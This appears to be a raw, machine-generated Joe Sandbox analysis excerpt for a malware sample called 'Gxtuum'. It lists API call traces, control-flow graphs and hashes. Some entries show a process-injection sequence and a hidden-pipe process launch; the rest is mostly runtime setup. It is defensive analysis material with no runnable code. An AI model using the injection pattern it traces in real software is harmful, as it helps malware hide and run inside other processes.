                                                                control_flow_graph 79 11ab80-11ab8b 80 11ab99-11ab9f 79->80 81 11ab8d-11ab97 79->81 83 11aba1-11aba2 80->83 84 11abb8-11abc9 RtlAllocateHeap 80->84 81->80 82 11abcd-11abd8 call 111652 81->82 88 11abda-11abdc 82->88 83->84 86 11aba4-11abab call 116535 84->86 87 11abcb 84->87 86->82 92 11abad-11abb6 call 113d81 86->92 87->88 92->82 92->84
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00117362,00000001,00000364,00000006,000000FF,?,00111657,000E2397), ref: 0011ABC1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 37bb2b4fe3971e7417b102b21301f2427ca421a292db0d1b981ea862cb71b576
                                                                • Instruction ID: ef7271fc7cc85ef3315b4a3086c735f21d4a818e95fb6cc819ccac44e1df5705
                                                                • Opcode Fuzzy Hash: 37bb2b4fe3971e7417b102b21301f2427ca421a292db0d1b981ea862cb71b576
                                                                • Instruction Fuzzy Hash: 62F0E93560E2647BDB6D1A669C01FDB3F4AAF417B0B554035FC19D6094CB21D8C182E6
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000E809D
                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 000E80FB
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 000E8114
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 000E8129
                                                                • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 000E8149
                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 000E818B
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 000E81A8
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000E8261
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                                • String ID: $VUUU$invalid stoi argument
                                                                • API String ID: 3796053839-3954507777
                                                                • Opcode ID: 127d13260c90c77a7562afea044efee8eab4d11af34ecc7a374f22d218b193d9
                                                                • Instruction ID: 3bcdc2808f5afaff9d46d60c7d64e03b759be57777b776006b3a493180bff5aa
                                                                • Opcode Fuzzy Hash: 127d13260c90c77a7562afea044efee8eab4d11af34ecc7a374f22d218b193d9
                                                                • Instruction Fuzzy Hash: C6417F70644341BFD7609F61DC06F96BBE8FF88B01F004419B788E65E0DBB0A994CB96
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00122FC0,00000002,00000000,?,?,?,00122FC0,?,00000000), ref: 00122D3B
                                                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00122FC0,00000002,00000000,?,?,?,00122FC0,?,00000000), ref: 00122D64
                                                                • GetACP.KERNEL32(?,?,00122FC0,?,00000000), ref: 00122D79
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                • Opcode ID: 2d339a5fef67899f6208fb7ccf202bd836c8c7ed7edec042714478eab500a0d7
                                                                • Instruction ID: 79147b9964d36a45b27890066eb72939872cd3436922da64e5e6cf33a6a9d020
                                                                • Opcode Fuzzy Hash: 2d339a5fef67899f6208fb7ccf202bd836c8c7ed7edec042714478eab500a0d7
                                                                • Instruction Fuzzy Hash: 8A21C532600128BBD7398FA4E900BDF73A6FF50B60B5A8164E90ADB215E772DD61C750
                                                                APIs
                                                                  • Part of subcall function 001171C0: GetLastError.KERNEL32(?,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 001171C5
                                                                  • Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 00117263
                                                                  • Part of subcall function 001171C0: _free.LIBCMT ref: 00117222
                                                                  • Part of subcall function 001171C0: _free.LIBCMT ref: 00117258
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00122F83
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00122FCC
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00122FDB
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00123023
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00123042
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                • String ID:
                                                                • API String ID: 949163717-0
                                                                • Opcode ID: 11c98b213c349d5ea30d51a98e98be7179e171d3b811b2f713383cad3ec8ae18
                                                                • Instruction ID: 06cf2b9bdd7f5b03b7123ffc4bd472728ca51fb3fd3a0752b21b399309770482
                                                                • Opcode Fuzzy Hash: 11c98b213c349d5ea30d51a98e98be7179e171d3b811b2f713383cad3ec8ae18
                                                                • Instruction Fuzzy Hash: 2B51AF71A00225BFDB20EFA4ED41AFEB7B8BF18700F190429F900E7190E7B09964CB61
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0010A8A1
                                                                • IsDebuggerPresent.KERNEL32 ref: 0010A96D
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0010A98D
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0010A997
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                • String ID:
                                                                • API String ID: 254469556-0
                                                                • Opcode ID: 947cf73968401b4cfbbd9ec097a3a606a5f8fe733a1dba11415a5d8c98e9bd5c
                                                                • Instruction ID: 921b209c6bde3662dd67bc18a67481e3f792c1df94e1fd634f04693d8104e4df
                                                                • Opcode Fuzzy Hash: 947cf73968401b4cfbbd9ec097a3a606a5f8fe733a1dba11415a5d8c98e9bd5c
                                                                • Instruction Fuzzy Hash: E2312775E05318DBDB20DFA0D9897CDBBB8BF18304F1041AAE44DAB290EBB05A85CF45

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 192 1097dd-109a96 GetModuleHandleW GetProcAddress * 40
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001097E3
                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001097F1
                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00109802
                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00109813
                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00109824
                                                                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00109835
                                                                • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00109846
                                                                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00109857
                                                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00109868
                                                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00109879
                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0010988A
                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0010989B
                                                                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001098AC
                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001098BD
                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 001098CE
                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 001098DF
                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 001098F0
                                                                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00109901
                                                                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00109912
                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00109923
                                                                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00109934
                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00109945
                                                                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00109956
                                                                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00109967
                                                                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00109978
                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00109989
                                                                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0010999A
                                                                • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001099AB
                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001099BC
                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001099CD
                                                                • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 001099DE
                                                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001099EF
                                                                • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00109A00
                                                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00109A11
                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00109A22
                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00109A33
                                                                • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00109A44
                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00109A55
                                                                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00109A66
                                                                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00109A77
                                                                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00109A88
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                • API String ID: 667068680-295688737
                                                                • Opcode ID: 90138d602cd96d544ff80207a6eb0c79db75a7c178fb1b8152578b25cd7118d8
                                                                • Instruction ID: 14dd56a4a91128b5906b7de6fe3bc2ec9e5ac023324abe6c6bb687b91c1803af
                                                                • Opcode Fuzzy Hash: 90138d602cd96d544ff80207a6eb0c79db75a7c178fb1b8152578b25cd7118d8
                                                                • Instruction Fuzzy Hash: 45618AB5956360BFCB087FB5BD0EA5A3EA8BF0A746724441AF901E2974DBF441C08F64

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 638 e8280-e8335 call 10ba40 call 102750 call 10ba40 * 2 GetTempPathA 647 e8338-e833d 638->647 647->647 648 e833f-e8367 call 112a89 647->648 651 e836d-e836f 648->651 652 e85b2-e85d5 call 102670 call e8630 648->652 654 e8371-e837c 651->654 661 e85ff-e861b call 109db0 652->661 662 e85d7-e85e3 652->662 654->654 656 e837e-e841d call 10ba40 CreatePipe SetHandleInformation 654->656 663 e85a3 GetLastError 656->663 664 e8423-e8497 Wow64DisableWow64FsRedirection CreateProcessA Wow64RevertWow64FsRedirection 656->664 665 e85f5-e85fc call 10a429 662->665 666 e85e5-e85f3 662->666 668 e85a9-e85af call 112241 663->668 664->663 669 e849d-e84a9 664->669 665->661 666->665 671 e8621-e8626 call 10f419 666->671 668->652 670 e84b0-e84c3 WaitForSingleObject 669->670 675 e84e9-e8502 PeekNamedPipe 670->675 676 e84c5-e84e3 PeekNamedPipe 670->676 675->670 682 e8504-e850b 675->682 676->675 681 e8575-e85a1 CloseHandle * 4 676->681 681->668 682->670 683 e850d-e8529 ReadFile 682->683 683->670 684 e852b-e8536 683->684 685 e861c call 10a0cd 684->685 686 e853c-e856e call 104d90 PeekNamedPipe 684->686 685->671 686->682 690 e8570 686->690 690->670
                                                                APIs
                                                                • GetTempPathA.KERNEL32(00000080,?), ref: 000E832D
                                                                • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 000E8403
                                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 000E8415
                                                                • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 000E8459
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 000E8481
                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 000E848F
                                                                • WaitForSingleObject.KERNEL32(?,00000064), ref: 000E84B8
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E84DA
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E84FE
                                                                • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 000E8525
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E856A
                                                                • CloseHandle.KERNEL32(?), ref: 000E8581
                                                                • CloseHandle.KERNEL32(?), ref: 000E8589
                                                                • CloseHandle.KERNEL32(00000000), ref: 000E8591
                                                                • CloseHandle.KERNEL32(00000000), ref: 000E8599
                                                                • GetLastError.KERNEL32 ref: 000E85A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                                • String ID: D
                                                                • API String ID: 3215130363-2746444292
                                                                • Opcode ID: f3cefdb7817f92995fc82875e7c1bfe95f295a0bb25ca72294d000be1f84c22c
                                                                • Instruction ID: c26561b2ae39208339ffe200facd5424d09fb0f9e458889925e590a259393ae1
                                                                • Opcode Fuzzy Hash: f3cefdb7817f92995fc82875e7c1bfe95f295a0bb25ca72294d000be1f84c22c
                                                                • Instruction Fuzzy Hash: C4A18E71A40268AFEB24DF60CC46BDDB7B9AF04700F1041E5EA09B61D0DBB5AE84CF90

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 691 12047f-12048d 692 1204a2-1204b5 call 1288e0 691->692 693 12048f-12049d call 111652 691->693 699 120696-12069b call 111652 692->699 700 1204bb-1204bd 692->700 698 1206af-1206b1 693->698 705 1206a1 699->705 700->699 702 1204c3-1204d6 call 120a7e 700->702 708 120553-12055d 702->708 709 1204d8-1204db 702->709 707 1206a4-1206ae call 1185a6 705->707 707->698 708->705 710 120563-120579 call 120ab2 708->710 712 1204f9-1204fc 709->712 713 1204dd-1204e3 709->713 723 1205ca-1205cd 710->723 724 12057b-12057d 710->724 717 120505-120522 call 11ab80 call 1185a6 712->717 718 1204fe-120500 712->718 713->712 714 1204e5-1204ec call 1146ca 713->714 714->699 726 1204f2-1204f7 call 120a7e 714->726 717->705 737 120528-12052e 717->737 718->707 723->707 727 1205d3-1205dd 723->727 724->723 728 12057f-12058e call 1185a6 724->728 726->708 727->705 731 1205e3-1205e9 727->731 739 1205c0-1205c8 728->739 740 120590-120593 728->740 731->705 735 1205ef-120609 call 120b75 call 1185a6 731->735 735->705 758 12060f-120617 735->758 737->708 741 120530-12054d call 11ab80 call 1185a6 737->741 742 120620-120623 739->742 744 12059d-1205a0 740->744 741->705 741->708 742->707 746 120625 742->746 749 1205a2-1205bc call 120b75 call 1185a6 744->749 750 120595-12059c 744->750 751 120628-12062d 746->751 749->742 764 1205be 749->764 750->744 751->751 756 12062f-120645 call 11ab80 751->756 765 120647-120658 call 1165d0 756->765 766 12068d-120694 call 1185a6 756->766 761 12061b 758->761 761->742 764->761 771 1206b2 765->771 772 12065a-12067d call 1272a1 765->772 766->707 774 1206b7 call 10f436 771->774 772->766 777 12067f-120687 call 111652 772->777 776 1206bc-1206cb 774->776 778 1206e0-1206f3 call 128a0b 776->778 779 1206cd-1206db call 111652 776->779 777->766 786 1208e9-1208ee call 111652 778->786 787 1206f9-1206fb 778->787 788 120902-120904 779->788 794 1208f4 786->794 787->786 789 120701-12071c call 120a98 787->789 795 120722-12072a 789->795 796 1207a7-1207c1 call 120b07 789->796 797 1208f7-120901 call 1185a6 794->797 798 120744-120748 795->798 799 12072c-12072e 795->799 807 1207c3-1207c5 796->807 808 12080f-120813 796->808 797->788 804 120751-120753 798->804 805 12074a-12074c 798->805 799->798 802 120730-120737 call 1146cf 799->802 802->786 820 12073d-120742 call 120a98 802->820 809 120782-120796 call 11ab80 call 1185a6 804->809 810 120755-120772 call 11ab80 call 1185a6 804->810 805->797 807->808 812 1207c7-1207d7 call 1185a6 807->812 808->797 816 120819-120823 808->816 838 120799-1207a1 809->838 810->794 835 120778-120780 810->835 828 1207d9-1207e1 812->828 829 1207ee-1207f1 812->829 816->794 821 120829-12082f 816->821 820->838 821->794 822 120835-12084b call 120b75 call 1185a6 821->822 822->794 845 120851-12085c 822->845 834 120866-120869 828->834 836 1207f3-12080b call 120b75 call 1185a6 829->836 837 1207e6-1207ed 829->837 834->797 840 12086f-120871 834->840 835->796 835->809 836->834 852 12080d 836->852 837->829 838->794 838->796 843 120874-12087d 840->843 843->843 846 12087f-120897 call 11ab80 843->846 848 120860 845->848 853 1208e0-1208e7 call 1185a6 846->853 854 120899-1208ab call 11ca59 846->854 848->834 852->848 853->797 859 120905 854->859 860 1208ad-1208d0 SetEnvironmentVariableW 854->860 861 12090a call 10f436 859->861 860->853 862 1208d2-1208da call 111652 860->862 863 12090f 861->863 862->853
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$___from_strstr_to_strchr
                                                                • String ID:
                                                                • API String ID: 3409252457-0
                                                                • Opcode ID: 988a7eef56ca0618743ebb60df0fb75319b6f8a41b2fb4b90457abca555d9512
                                                                • Instruction ID: 5f582b872ce368bb03235f59cefe588a8e44016dd4693828437349844eaec36e
                                                                • Opcode Fuzzy Hash: 988a7eef56ca0618743ebb60df0fb75319b6f8a41b2fb4b90457abca555d9512
                                                                • Instruction Fuzzy Hash: 9BD11A71D00325AFDB26AF74AC81AAE77E4EF59310F05436DF94497283EB7199A0CB90
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$Info
                                                                • String ID:
                                                                • API String ID: 2509303402-0
                                                                • Opcode ID: 6f62771312da8ace534fa953c6328898005d9fc3236994f48e781bd40afd89ab
                                                                • Instruction ID: 1f3dbe7c60fb617b98a3d086d13da9e15682adaf4d3f112a03b17462bb5df430
                                                                • Opcode Fuzzy Hash: 6f62771312da8ace534fa953c6328898005d9fc3236994f48e781bd40afd89ab
                                                                • Instruction Fuzzy Hash: 69D18D71D003459FDB25DFA8C881BEEBBF5FF58310F144139E4A9A7292DB70A9858B60
                                                                APIs
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00148FA8,00000FA0,?,?,00109DC8), ref: 00109DF6
                                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00109DC8), ref: 00109E01
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00109DC8), ref: 00109E12
                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00109E24
                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00109E32
                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00109DC8), ref: 00109E55
                                                                • DeleteCriticalSection.KERNEL32(00148FA8,00000007,?,?,00109DC8), ref: 00109E71
                                                                • CloseHandle.KERNEL32(00000000,?,?,00109DC8), ref: 00109E81
                                                                Strings
                                                                • WakeAllConditionVariable, xrefs: 00109E2A
                                                                • kernel32.dll, xrefs: 00109E0D
                                                                • SleepConditionVariableCS, xrefs: 00109E1E
                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00109DFC
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                • API String ID: 2565136772-3242537097
                                                                • Opcode ID: 0ceb47a2b9d88cd49dc349a3b48c372cdd23b2a28a7b7bb242212de1a58f0b2e
                                                                • Instruction ID: b600d90773ea8beaee927d555b28179f0e655fbb4fc11b7b06190186fc3fb330
                                                                • Opcode Fuzzy Hash: 0ceb47a2b9d88cd49dc349a3b48c372cdd23b2a28a7b7bb242212de1a58f0b2e
                                                                • Instruction Fuzzy Hash: 6001DF74645311BBDB21AB74BC19A2B3A69BF85B91B140014FC40D6AE4DFB0CC808660
                                                                APIs
                                                                • _free.LIBCMT ref: 00120E14
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 00120E26
                                                                • _free.LIBCMT ref: 00120E38
                                                                • _free.LIBCMT ref: 00120E4A
                                                                • _free.LIBCMT ref: 00120E5C
                                                                • _free.LIBCMT ref: 00120E6E
                                                                • _free.LIBCMT ref: 00120E80
                                                                • _free.LIBCMT ref: 00120E92
                                                                • _free.LIBCMT ref: 00120EA4
                                                                • _free.LIBCMT ref: 00120EB6
                                                                • _free.LIBCMT ref: 00120EC8
                                                                • _free.LIBCMT ref: 00120EDA
                                                                • _free.LIBCMT ref: 00120EEC
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
